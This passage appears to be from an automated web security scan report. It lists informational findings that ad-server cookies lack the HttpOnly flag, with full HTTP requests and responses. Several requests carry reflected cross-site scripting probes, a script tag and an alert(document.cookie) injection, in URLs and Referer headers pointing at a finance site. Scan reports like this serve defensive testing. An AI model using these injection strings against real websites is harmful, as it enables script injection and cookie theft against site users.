The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...

17.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d1e80eb13df2; expires=Tue, 01-Mar-2011 23:26:33 GMT; path=/
i_1=33:1359:827:0:0:34115:1296343593:B2|33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L; expires=Mon, 28-Feb-2011 23:26:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4d1e80eb13df2; i_1=33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L|33:971:560:0:0:36941:1294798634:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d1e80eb13df2; expires=Tue, 01-Mar-2011 23:26:33 GMT; path=/
Set-Cookie: i_1=33:1359:827:0:0:34115:1296343593:B2|33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L; expires=Mon, 28-Feb-2011 23:26:33 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

17.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/
fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com
i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:46 GMT; path=/
i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L; expires=Tue, 01-Mar-2011 12:56:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.redacted//?4ae1b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:46 GMT; path=/
Set-Cookie: i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L; expires=Tue, 01-Mar-2011 12:56:46 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

17.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:14 GMT; path=/
i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2; expires=Tue, 01-Mar-2011 17:59:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:14 GMT; path=/
Set-Cookie: i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2; expires=Tue, 01-Mar-2011 17:59:14 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

17.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:27 GMT; path=/
i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 13:00:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:27 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 13:00:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 903

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd1
...[SNIP]...

17.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:50 GMT; path=/
i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 13:00:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:50 GMT; path=/
Set-Cookie: i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 13:00:50 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 897

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d
...[SNIP]...

17.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:25 GMT; path=/
i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2; expires=Tue, 01-Mar-2011 17:59:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:25 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2; expires=Tue, 01-Mar-2011 17:59:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 885

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8
...[SNIP]...

17.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:27:28 GMT; path=/
i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:27:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:27:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:27:28 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:27:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 843

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f
...[SNIP]...

17.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252
...[SNIP]...

17.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:47 GMT; path=/
i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 12:56:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:47 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 12:56:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 813

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183b
...[SNIP]...

17.82. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bh="b!!!#m!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!